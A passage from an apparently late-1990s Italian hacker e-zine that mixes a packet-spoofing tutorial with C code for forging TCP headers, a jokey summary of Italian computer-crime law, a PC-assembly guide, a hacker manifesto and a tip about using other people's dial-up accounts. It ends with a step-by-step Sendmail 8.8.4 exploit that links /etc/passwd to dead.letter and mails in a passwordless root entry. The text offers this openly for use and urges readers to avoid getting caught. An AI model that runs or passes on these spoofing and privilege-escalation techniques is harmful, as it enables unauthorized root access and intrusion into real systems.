della medesima. Se invece non Š numerico, tentiamo di risolverlo e se ci
riusciamo si pu• benissimo ritornare il valore long dell'host, altrimenti
si da come risultato 0.
Per fixare l'header TCP:
void sp_fix_TCP_packet(struct spdataexchange *sp)
{
char *pseudo_ip_construct[1500];
struct tcpheader *sp_help_tcp;
struct pseudoipheader *sp_help_pseudo_ip;
int i;
for(i=0;i<1500;i++)
pseudo_ip_construct[i]=0;
sp_help_tcp = (struct tcpheader *) (sp->buffer+IP_HEADER_BASE+sp->ip_optlen);
sp_help_pseudo_ip = (struct pseudoipheader *) pseudo_ip_construct;
sp_help_tcp->offset_flags = htons((((TCP_HEADER_BASE+sp->tcp_optlen)/4)<<12) |
sp->flags);
sp_help_tcp->seq = sp->seq;
sp_help_tcp->ack = sp->ack;
sp_help_tcp->source = htons(sp->sourceport);
sp_help_tcp->destination = htons(sp->destinationport);
sp_help_tcp->window = htons(0x7c00);
sp_help_pseudo_ip->source = sp_getaddrbyname(sp->source);
sp_help_pseudo_ip->destination = sp_getaddrbyname(sp->destination);
sp_help_pseudo_ip->zero_byte = 0;
sp_help_pseudo_ip->protocol = TCP;
sp_help_pseudo_ip->TCP_UDP_lenght =
htons(sp->datalen+TCP_HEADER_BASE+sp->tcp_optlen);
memcpy(pseudo_ip_construct+12,sp_help_tcp,sp->datalen+TCP_HEADER_BASE+sp->optlen
);
sp_help_tcp->checksum = in_cksum((unsigned short *)pseudo_ip_construct,
sp->datalen+12+TCP_HEADER_BASE+sp->tcp_optlen);
}
Ecco qua! Ultimo appunto: la in_cksum Š una funzione che potete trovare
dappertutto, anche sul ping.c o su uno dei vari nuker... Non mi dilungo anche
sull'UDP (ma questa Š discriminazione razziale! :)), anche perch‚ se conoscete
bene il C (spero, altrimenti che avete fatto, avete letto fin qua senza capire
un c***o???) Š molto intuitiva da realizzare... Se rimanete nel dubbio, per•,
leggetevi i sorgenti di spoofit.h, una libreria che mi ha ispirato non poco.
Non ricordo il nome dell'autore, un attimo... Ah, si: Bretch Claerhout.
NOTICINA: se non vi va di scrivervi gli header ip, tcp e/o udp a da soli, li
potete semplicemente aggiungere queste righe all'inizio del codice :)
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
//contiene lo struct per lo header ip
//contiene quello per il tcp
//e quello per l'udp
ma se ve l'avessi detto prima avreste potuto comprendere come Š formato un
header ip???
Bene, ora, se avete imparato a spoofare, vi chiederete: come si fa a vedere le
risposte che ci manda l'host vittima??? Dobbiamo fare tutto a caso? Beh, in
effetti se sapete prevedere bene le risposte del server potreste farlo,
ma esiste un'altra tecnica, per leggere dei pacchetti non propriamente
destinati a noi... Ecco a voi lo
------------------------6) Sniffing
Non mi dilungo molto sullo sniffing. C'Š per• da dire che sniffare un
pacchetto Š diverso che sniffare cocaina ed ha risultati meno disastrosi (a
meno che non sniffiate un pacchetto di cocaina :D ). Se volete approfondire
questa tecnica, vi consiglio di leggervi sia la spoofit di Bretch Claerhout
che il file sniffit.c, i sorgenti dello sniffer sempre del suddetto.
Oppure vi consiglio di prokurarvi uno sniffer preconfezionato, tanto cercando
su astalavista.box.sk avrete solo l'imbarazzo della scelta...
Lo sniffing opera solo su reti ethernet, quindi non pensate di mettervi a
sniffare fbi.gov se non siete nella sua subnet...
Se prendete uno sniffer, potrete avere risultati simili
100.100.100.2 > 100.100.100.1
(TTL:255, Window:255)
SEQ:1233156198 ACK:0
Flags: -S----
100.100.100.2 < 100.100.100.1
(TTL:255, Window:511)
SEQ:2444444444 ACK:1233156199
Flags: -S--A-
100.100.100.2 > 100.100.100.1
(TTL:255, Window:91925)
SEQ:1233156200 ACK:2444444445
Flags: ----A-
(numeri a cavolo a parte, lo skema può variare leggermente da Sniffer a sniffer)
in questo caso Š sempre il 3 way handshake...
Comunque, lo sniffing pu• essere combinato allo spoofing per ottenere l'
------------------------7) Hijacking
Hijacking Š un termine coniato durante il proibizionismo in america che
consisteva nel rapinare i contrabbandieri di alcoolici. Sul mio vocabolario
c'Š scritto anche: Rapinare, fare il doppio gioco.
Ora, tralasciando le origini del termine, che cosa Š oggi l'hijacking???
Mettiamo che voi vi connettiate ad un host da un ip spoofato, e poi che
sniffiate le risposte che l'host manda all'ip che avete scelto voi per
spoofare. Bene, questo Š hijacking. Anche qui non mi dilungo molto, visto
che c'Š sempre il buon vecchio Astalavista e poi nell'articolo di Bretch
sullo spoofing c'Š, oltre ai sorgenti della spoofit, anche un telnet hijacker,
se non mi sbaglio.
Bene, sono giunto alla
------------------------8) Conclusione
Spero di avervi delucidato un po le idee sull'argomento masquerading/spoofing
(che, ahinoi, al giorno d'oggi molti prendono per la stessa cosa), se ci sono
errori vi prego di segnalarmeli (non errori di ortografia, naturalmente :))
e cercher• di mandare un errata corridge.
Naturalmente le cose che ho detto sulla Microsoft© e sulla Sun Microsystem©
spesso sono esagerazioni (anzi, sempre), anche perch‚ io uso linux solo quando
devo fare sniff e spoof, ma per il resto uso sempre Windows 98, che Š molto
pi— semplice. Mi scuso per aver insultato il gruppo "IL TIMONE" (tutti sanno
che se uno cade dal seggiolone da piccolo difficilmente si riprender…)
e spero che un giorno si accorgeranno che anche se fermano uno di noi, non
possono fermarci tutti.
Ma ora, prima della rubrica dedicata alla sessualit…, vediamo quali sono i
libri della settimana (Piero Angela RULEZ!!! :)):
-TCP/IP Illustrated (saga in 3 volumi di cui non ne ho letto manco uno)
-TCP/IP for dummies (per chi non si vuole sorbire i 3 TCP/IP Illustrated ma
che, come si deduce dal titolo di questo libro, Š uno stupido)
-La mia lunga strada dall'inferno (The long hard road out of hell)... Ok, il
libro di Marilyn Manson non c'entra n kakka, ma Š molto bello vedere come
riceve le "ali"...
-I 2 libri di Bill Gates©, perch‚ sar… anche scemo lo zio Bill ma Š fuRRRRBo
-L'albero della vita per voi poveretti che ancora non sapete come nascono i
bambini
-Mein Kampfh (si scrive cos•?) di Adolf Hitler per vedere che era davvero
un pazzo
-Tutti i libri di Stephen king che Š un MITOOOOOO!
-I libretti dei CD dei Marilyn Manson (ce li avete, vero??? ;))
Alla prossima!
Mr_Skull
Falsit…
Falsit…
Realt… falsificate
Tutte in fila come spugne in attesa
di assorbire le realt… terziarie della vita
-Brian Warner
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
for the great members of
@-,”i''i'”,.,”i''i'”,.,”i''i'”,.,”i''i'”,.,”i''i'”,-@
|
_
_
____ _
|
| | \ | | _____
_| __ )(_) ___ ___ |
-+- | \| |/ _ \ \ /\ / / _ \| |/ _ Y __|-+: | |\ | __/\ V V /| |_) | | __|__ \ :
| |_| \_|\___| \_/\_/ |____/|_|\___|___/ |
@-,”i''i'”,.,”i''i'”,.,”i''i'”,.,”i''i'”,.,”i''i'”,-@
Allora, escludendo tutte le possibili ammirazioni che potrei fare sulla
vostra e-zine (n.r. uaaa maro' stu' zine e' propeto ruoss', con noto accento
meridionale..) passiamo alle cose serie.
vorrei iniziare a far parte del vostro gruppo :)
Cero, si, si lo so che inquesto preciso momento dite "ma chi lo conosce a
questo, quasi quasi ci spediamo un pacco bomba a casa e la facciamo finita".
purtroppo per voi la cosa non e' cosi' semplice per due semplici motivi :
1) non sapete dove abito e
2) mi sono dimenticato di dirvi che sono superman (no, forse superman no) sono
l'incredibile hulk (forse con la pancetta ci sono :)
forse potrei essere Mac Gyver.. si', ho deciso, sono proprio lui.
Sigla : papapa parapa paap parpapapra (mi pare faccia proprio cosi')
Allora precisando due cose :
1) non e' che mi possa definire un vero hacker, ne' un craker, ne' un
programmatore, ne' un phreaker, ne' un essere mitologico. Vabbe' allora che
scrivi a fare, mi direte voi ..
sono semplicemente un newbies :) non ho mai bucato il pentagono, ne' il norad,
ne' il sito di mtv, comunque potrei avere le conoscenze per bucarli (almeno
quello di mtv).
Sto' pian piano assimilando le tecniche di hacking e di phreaking come Luke
Skywalker quelle della forza jedi. Per quel che riguarda la programmazione,
purtroppo, so solo il fortran, e forse l'anno prox parto con il matlab. non
so a chi possa servire ma comunque...
2) potrei scrivere di cazzate e non (droga, alcool, anarky, bombe) il tutto
mischiato a quello che so di hack e varie.
fatemi sapere la mia e-mail is : [email protected]
Per ora vedete se questo vi piace :
|
|.|
|.|
|\./|
|\./|
.
|\./|
.
\^.\
|\\.//|
/.^/
\--.|\
|\\.//|
/|.--/
\--.| \
|\\.//|
/ |.--/
\--.|\
|\./|
/|.--/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_- _
- -/_/_/- ^ ^ | ^ ^ -\_\_\- ////////////////////////////////S_A_S_H_A\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
||||||||||||||||||||||||||||||||S_A_S_H_A|||||||||||||||||||||||||||||||||||||||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\S_A_S_H_A///////////////////////////////////////
Beh, di solito questi articoli iniziano con cose del tipo "sono stato
contattato da ***** che ha contattato ***** e che mi ha chiamato. grazie *****
Io invece dovro' iniziare cosi' : nessuno mi ha contattato, nessuno ha
contattato un'altro che poi mi ha contattato. sono (forse) su questa e-zine
perche' ho scritto io. Grazie a me :)
Salve sono Troy Mclure vi ricorderete di me in azioni hacker come "hackerando
sotto la pioggia" oppure "hackerate il computer del soldato Ryan".
Oggi parliamo dalle leggi italiane che ci interessano da vicino.
Premetto che non studio giurisprudenza ma chimica :) Purtroppo ci sono delle
cose che si devono sapere. Proprio come le leggi italiane. Hacker novelli
come me sono presi da film hackers o wargames sanno che in america ad essere
un hacker potresi quasi finire sulla sedia elettrica. Qui le cose sono un po
diverse : anche perche' l'italia non ha tutte le risorse dell'america : avete
mai visto voi una scuola collegata in rete, dove potete cambiare l'allarme
antincendio? (hackers)
oppure sapete dove cambiare il timer dei semafori? (sempre hackers).
Comunque non e' che qui ci vadano molto piu' piano con le condanne.
Per prima cosa una importantissimissimissima :
PER IL CODICE CIVILE VIENI CONDANNATO PER QUALSIASI COSA CHE FAI :(
PER IL CODICE PENALE SE COMMETTI UN CRIMINE CHE NON HA UNA LEGGE PENALE, NON
TI POSSONO CONDANNARE :)
Cio' implica che prima di fare qualsiasi cosa vedete se c'e' la legge apposita,
se c'e' fatelo senza farvi beccare, se non ci dovesse essere la legge....
chiamatemi, verro a farlo con voi(qualsiasi cosa dovrete fare :)
Vediamo le leggi :
c.p legge 420
l'arresto in fragranza e' obbligatorio (se non vi colgono sul fatto potete
sempre fare finta di niente.)
il fermo e' cosentito
la competenza e' del tribunale
si procede d'ufficio
Attentato a impianti di pubblica utilita'.
Chiunque commette un fatto diretto a danneggiare o distruggere impianti di
pubblica utilita', e' punito, salvo che il fatto costituisca piu' grave reato,
con la reclusine da uno a quattro anni.
La pena si applica anche a chi commette un fatto diretto a danneggiare o
distruggere un sistema informatico o telematico di pubblica utilita', ovvero
dati, informazioni o programmi in esso contenuti o ad essi pertinenti.
P.S = potete anche svotargli il cestino per fargli un favore e vi beccate
la gabbia
----------------------------------------------------------------------------c.p 615
l'arresto in fragranza e' facoltativo
il fermo non e' consentito (potete anche emigrare alle haway)
la competenza e' del pretore
si procede con querela e poi d'ufficio
Accesso abusivo ad un sistema informatico o telematico.
chiunque abusivamente si introduce in un sistema informatico o telematico
protetto da misure di sicurezza, ovvero vi si mantiene contro la volonta'
espressa o tacita di chi ha il diritto di escluderlo, e' punito con la
reclusione fino a tre anni.
la pena della reclusione e' da uno a cinque anni :
1)se il fatto e' commesso da un pubblico ufficiale o da un incaricato di un
pubblico servizio, con abuso di poteri o con violazione dei doveri inerenti
alla funzione o al servizio , o da chi esercita anche abusivamente la
professione di investigatore privato, o con l'abuso della qualita' di
operatore di sistema;
2)se il colpevole per commettere il fatto usa violenza sulle cose o alle
persone;
3)se dal fatto deriva la distruzione o il danneggiamento del sistema o
l'interruzione totale o parziale del suo funzionamento;
Qualora i fatti riguardino sistemi informatici o telematici di interesse
militare o relativi all'ordine pubblico o alla sanita' o alla protezione
civile la pena e' da tre a otto anni.
----------------------------------------------------------------------------c.p 615-4
Detenzione e diffusione abusiva di codici di accesso a sistemi informatici o
telematici.
Chiunque al fine di procurare a se' o ad altri un profitto o di arrecare ad
altri un danno, abusivamente si procura, riproduce, diffonde, comunica o
consegna codici, parole chiave o altri mezzi idonei all'accesso ad un sistema
informatico o telematico protetto da misure di sicurezza,
o comunque fornisce indicazioni o istruzioni idonee al predetto scopo, e'
punito con la reclusione sino a un anno e con una multa sino a lire dieci
milioni.
----------------------------------------------------------------------------c.p 615-6
Diffusione di programmi diretti a danneggiare o interrompere un sistema
informatico.
Chiunque diffonde, comunica o consegna un programma informatico da lui stesso
o da altri redatto, avente per scopo o per effetto il danneggiamento di un
sistema informatico o telematico, dei dati o dei programmi in esso contenuti
o ad esso pertinenti e' punito con la reclusione sino a due anni e con una
multa sino a lire venti milioni.
----------------------------------------------------------------------------c.p 617-4
Intercettazione, impedimento o interruzione illecitadi comunicazioni
informatiche o telematiche
Chiunque fraudolentemente intercetta comunicazioni relative a un sistema
informatico o telematico o intercorrenti tra piu' sistemi, ovvero le impedisce
o le interrompe, e' punito con la reclusioneda sei mesi a quattro anni.
----------------------------------------------------------------------------Beh, queste sicuramente non sono tutte ma sono quelle che io ho ritenuto piu'
importanti. A vederci ad una prossima volta, newbies favorevoli.
Mi potete trovare su #ahccc
Mi potete scrivere a [email protected]
S_A_S_H_A
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
GUIDA ALL' ASSEMBLAGGIO DI UN COMPUTER DALLA A ALLA Z
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
DISKLAIMER:io Devil_666 non mi prendo nessuna responsabilita'
per eventuali danni che potreste causare al vostro pc seguendo cio'
che viene detto in questa guida....insomma + o - e' kosi' no ??!!
1a PUNTATA: Montaggio di RAM & PERIFERICHE
Che dite ??!! No non vi ho preso per deficenti :) lo so benissimo che
ram e schede varie ve le sapete montare anke da soli......ma sapete kom e'...
bisogna iniziare da qualcosa di facile ;D
<><>RAM<><>
Allora, il primo problema per la ram e' l'acquisto: infatti esistono molti tipi
di ram ed ovviamente ce n'e' solo un tipo che funzia sul nostro picci', quindi
vediamo un po' che ka>>o di ram dobbiamo rubare...ehm.....volvevo dire
komprare per la nostra macchina. La prima distinizione e' fra SIMM e DIMM...le
prime sono quelle un po' + vecchie ormai poko prodotte ma ugualmente usate sui
picci' un po' + vecchi, mentre le seconde sono usate a partire generalmente da
pentium 200...
Kome riconoscerle??? E'facile...le simm sono + corte ed hanno solo 72 pin
(contatti va meglio ?? ;D) mentre le dimm sono + lunghe ed hanno 168 pin.
Aprendo il picci' le potete rikonoscere xche' le simm hanno i morsetti che le
tengono il ferro, memtre le dimm in plastika. Questa era la prima distinzio
ne...poi all'interno delle dimm c'e' da distinguere fra ram a 100 mhz e dimm
normali. Quelle a 100 mhz vengono usate su schede madri che hanno un clock
di 100 o + mhz e sono le + veloci in assoluto le altre dimm servono x le
altre motherboard. Se komprate dimm da 100 mhz e le montate su una scheda
madre con clock inferiore ai 100 mhz tutto vi funzionera' ugualmente ma la
spesa sara' + alta; questo puo' essere conveniente se avete in previsione di
sostituire anke la scheda madre......cosi' quando lo farete avrete gia' le ram
adatte al nuovo hadware (parolone eh?).
Ora che vi ho spiegato un po' kome scegliere le ram adatte al vostro picci' vi
diko kome montarle (lo so che e' una ka<<ata e riesce a tutti ma ve lo diko
uguale :PPP).
Allora, dopo che avete aperto il case, cerkati gli alloggiamenti per le ram...
prendete un banco di ram che dovete montare e appoggiatene la base
nell'apposita fessura tenendolo inclinato verso l'esterno......a questo punto
non vi rimane che spingere il banko ram verso l'interno del picci' fino a che
sentirete il click dei ganci che hanno blokkato la ram......o il click del
gancio che si e' stronkato in 2 ;D......cmq non vi preoccupate, montare le
ram e' un'operazione estermamente semplice che, anke se non avete mai fatto,
sarete in grado di fare in poki minuti. Beh, x quanto riguarda le ram penso
possa bastare no ??!!
<><>PERIFERICHE VARIE<><>
Il mantaggio di schede varie tipo audio video ecc.......e' ankora + facile di
quello delle ram.
L'unika cosa alla quale bisogna stare attenti e' all'acquisto di una scheda
che il nostro picci' possa accettare (non vi sto a dire che ve ne fate di una
scheda video agp 4x quando il vostro picci' e' un katamarano che ha x miracolo
i supporti x le pci.........:D) cmq sikuramente lo sapevate gia'....=).
Allora, una volta acquistata la scheda, non resta altro che rimuovere lo
sportelletto in metallo dietro il picci' in korrispondenza dello slot nel
quale si vuole montare la nostra scheda, inserire la scheda nello slot e
fissarla kon la vitina apposita.
Poi si puo' rikiudere il kase e dopo aver kollegato i kavi appositi alla
nostra nuova periferica si possono installare i driver necessari al suo
funzionamento ed il gioco e' fatto.
Ca<<o com era difficile eh ??!! :PPP
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Vabbe' newbies per questa uscita e' tutto; sui prossimi numeri dovreste
trovare montaggio di hard disk, elettori di cd-rom e floppy kome seconda
puntata, per il finale mi sono lasciato il montaggio di schede madri e
cpu.........Spero non mi passi la voglia di scrivere per questa stupenda
rivista !!!
Ho detto tutto mi pare........se avete bisogno di chiarimenti o volete darmi
consigli, idee, farmi notare errori e dimenticanze scrivete pire a:
[email protected] --> Devil_666
Consiglio: mentre qualunque domanda ed elogio e' ben accetto, per critiche ed
offese usate un server smtp e non la vostra kasella e-mail altrimente verrete
mailbombati pesantemente...;D...Eddai scherzo (forse).
Si, ora che ho detto tutte le ka<<ate che avevo da dire non mi resta altro
che salutarvi sperando che questo articolo sia di reale aiuto a qualche
lettore.
L'autore di questo art. Devil_666 vi saluta:
(new)Byezzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
PS: un grande tnx agli autori du questa e-zine zcools e nobody88 per avermi
concesso la possibilita' di scrivere per newbies........Spero che grazie
ai vostri sforzi riuscirete a mandare avanti questo bel progetto. Byezzzz
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
MANIFESTO DI CARNIFEX
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Ecco una lettera arrivatami da un newbies o hacker (non so) di nome Emanuele
che alla sua mail ha allegato un manifesto recentissimo trovato in giro per
la rete e subito sottopostoci per la visione e per la pubblicazione:
---<INIZIO E-MAIL>--Ciao nObody88, complimenti per la rivista.
Sono un ragazzo al quale e' passato per le mani un articolo molto bello stile
Manifesto hacker, che pero' denuncia anche i veri pirati informatici e mette
in luce vari aspetti interessanti.
E' un documento non molto lungo, quindi se ti piace potresti anche inserirlo
nel tuo prossimo (speriamo che ce ne sia) numero di Newbies.
Il nome di quello che l'ha scritto e' Carnifex, un nome che non ho mai
sentito ne' letto in alcun posto, quindi dovrebbe essere uno nuovo.
In allegato ti mando il file txt.
Ciao,
Emanuele
---<FINE E-MAIL>--PAURA ?
Non aver paura degli hacker quando ti parlano di crimini informatici,
ne' quando ti dicono che uno e' riuscito ad entrare nella tua banca,
e solo per fortuna non ha scombinato anche il tuo conto; non aver paura
dell'hacker se temi il dilagare della pirateria informatica o se tremi
al sol pensiero che uno di loro si e' preso gioco della N.A.S.A. rubando
un satellite con il computer. Non aver paura di loro come hacker perche'
loro, in realta', hacker non sono.
C'e' forse un po' di ignoranza nella gente, e forse e' un ignoranza indotta,
da coloro che nell'hacker vedono un pericolo, un nemico, un avanzo di galera.
Indotta forse da chi non riesce a prendersela che con gli hacker, ma loro,
vedete, non sono cosi'.
Quelli che chiamate genericamente hacker sono individui di diverse categorie,
che hanno a che fare con gli hacker solo per le conoscenze che hanno, poi
ognuno le mette in pratica come vuole: gli hacker entrando nei sistemi
informatici al solo scopo di capire come funzionano, e i cracker, i pirati
informatici, i lamer entrando nei sistemi informatici al solo scopo di
distruggerli o trarne vantaggi personali.
Qui e' la differenza. E non continuate a trattare gli hacker come criminali,
e non continuate ad aver paura di loro, e non chiamate la polizia se un
giorno un tizio bussa alla vostra porta e dice: - Sono un hacker.
(Mi rimangio l'ultima frase: un hacker non lo direbbe mai, se non altro
perche' un hacker non ammetterebbe di essere un hacker solo per vantarsi o
per far vedere che e' qualcuno)
Che dici? Ancora paura? Paura, ma non piu' degli hacker. Lo scenario e' lo
stesso: gli hacker si sono salvati il culo, ora la colpa di tutto ricadra'
sui pirati informatici, loro ormai sono puliti...ma cosa cambia in realta'?
Dopo tutto questo ambarada'n, a che conclusione si e' giunti?
Per il pover'uomo di provincia, per la massaia, per il direttore di banca,
per il ragazzo che bestemmia perche' il prezzo dei CD e' troppo alto, tutto e'
come prima, cambiera' solo il nome contro cui inveiranno all'unisono: non ci
sara' piu' un bastardo hacker, ma invece un bastardo fuorilegge telematico.
Per tutta questa gente il problema resta...che si puo' fare, allora?
Come si puo' ovviare a tutto cio'?
Esiste un modo...un modo che eliminerebbe i pregiudizi sugli hacker e
falcerebbe la strada ai pirati.
Infatti le sole persone che riuscirebbero a colpire al cuore tutti i
malviventi nella Rete sarebbero chi conosce la loro vita, chi conosce i loro
punti di forza e i loro punti deboli, chi sa che cosa fare e quando farla.
Chi come loro sa ma a differenza di loro non fa. E chi, se non gli hacker?
Essi, in nome di una dignita' che e' stata loro tolta, dovrebbero unirsi per
fare a pezzi tutti coloro che con l'illegalita' sulla Rete ci vivono, coloro
che rovinano il duro lavoro altrui.
Perche' non farlo? I problemi sarebbero presto risolti, e vero e' che alcuni
gruppi di hacker si stanno gia' battendo per far diventare Internet un "posto"
piu' sicuro, piu' piacevole e adatto a tutti, disgregando ad esempio le
associazioni di pedofili.
E tu, banchiere, la cui vita dipende dall'integrita' di alcuni computer, hai
ancora paura degli hacker?
(by Carnifex-giugno 1999)
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
RENDIAMOCI ANONIMI
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Anonimita' un Sacro diritto di ogni persona cerca un poko di privacy per fare
gli affari suoi nella rete.
Io credo che l'anonimita' tolale nella rete non esista ... kome e'successo
anke ai migliori competenti sysadmin , associazioni e corporazioni hanno
saputo rintracciare anke il log piu' remoto....
Cmq cerchiamo di nasconderci un poko nella rete cosi' per avere la nostra
privacy..
Allora idee che mi sono venute in mente [o meglio una struttura alquanto
sicura per nascondersi]
chiamiamo il nostro caro provider con account di altri ovviamente
e colleghiamoci poi entriamo nella nostra shell preferita e da essa
colleghiamoci col caro comando dial alla notra bbs preferica collegata
alla rete ora siamo un poko + anonimi e ci sentiamo molto meglio hehehe.
idee sono ben accette su ste 4 cose che detto
ZeroCool
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ IL MIO EXPLOIT PREFERITO... SM 8.8.4 !!! ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Va beeeeeneeeee...allora le dediche e le contro dediche...come
sempre....
Thi$ 4rT is DeD 2 : lo spagnolo che sulla spiaggia mi ha kiesto
di fargli una foto !!!
P.S. Anche alla figlia dello spagnolo....a cui avrei volentieri
fatto qualkosa che la sua nazionalita' suggerisce...vabbe'
Thi5 aRt is Vs-d3d To : Dante Alighieri che come lo stronzo al
suo "grazias" ha risposto con un "prego"
invece del suo solito "de nada"
Bhe..ora vi parlo del mio exploit preferiiiiiitoooooo...troppo
BeLLo !!!!!!
Beh..penso sappiate tutti qual'e' il + bacato dei programmi..
se non lo sapete questo bellissimo programmino
e' il SendMail..programma di posta elettronica tra i + usati.
Bene in questo articolo vi parlero' dell'exploit per guadagnare
privilegi da root su di un sistema avente caricato questo
programma nella sua versione 8.8.4 dehihohuuuu...miticooooo!!!
Per usufruire dell'exploit avrete bisogno di avere gia' un altro
account...se no vi sparate le pippette...sigh.
Allora avete l'account...e telnettandovi al server sulla porta 25
scoprite che il suo sendmail e' nella versione 8.8.4...benissimo...
siete a CavaLLuccio marino !!!
cosa fare ora ???
Entrate nel server telnettandovi col vostro account, e date il
comando
ln /etc/passwd /var/tmp/dead.letter
a cosa serve ???...boh?!?!...scherzo...ora ve lo spiego...
avete semplicemente linkato il file dove vanno a finire
le lettere perse al file di pass....a cosa ci e' servito ???
Bene...quello che vi sara' scritto in ogni e-mail andata persa
verra' trascritto nel file passwd.
A che pippozza mi serve ???..ora ve lo spiego...aspettate e vedrete!!!
telnettatevi sulla 25
ed impartite i seguenti comandi:
mail from: [email protected]
rcpt to: [email protected]
data
homer::0:0:ihih ohoh:/root:/bin/bash
.
quit
Avrete cercato di mandare una lettera ad una casella
che si chiama [email protected] non esiste!!!!
Allora il sistema che fa ???
prende il contenuto dell'e-mail
(homer::0:0:ihih ohoh:/root:/bin/bash)
e la aggiunge al passwd...vi sarete cosi' creati un account
da root con login homer e senza alcuna pass.
+ facile di cosi' si muore !!!!
Ciao BeLLi....e alla prossiminaaaaaaa !!! Ciaoooooooooo
bye bye Dante Alighieri...NeWBiEs StaFf...
08V|0U5 : 54|NT 59|R|T5 !!!!
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
TELEPIU' TERRESTRE: INFO VARIE
³º
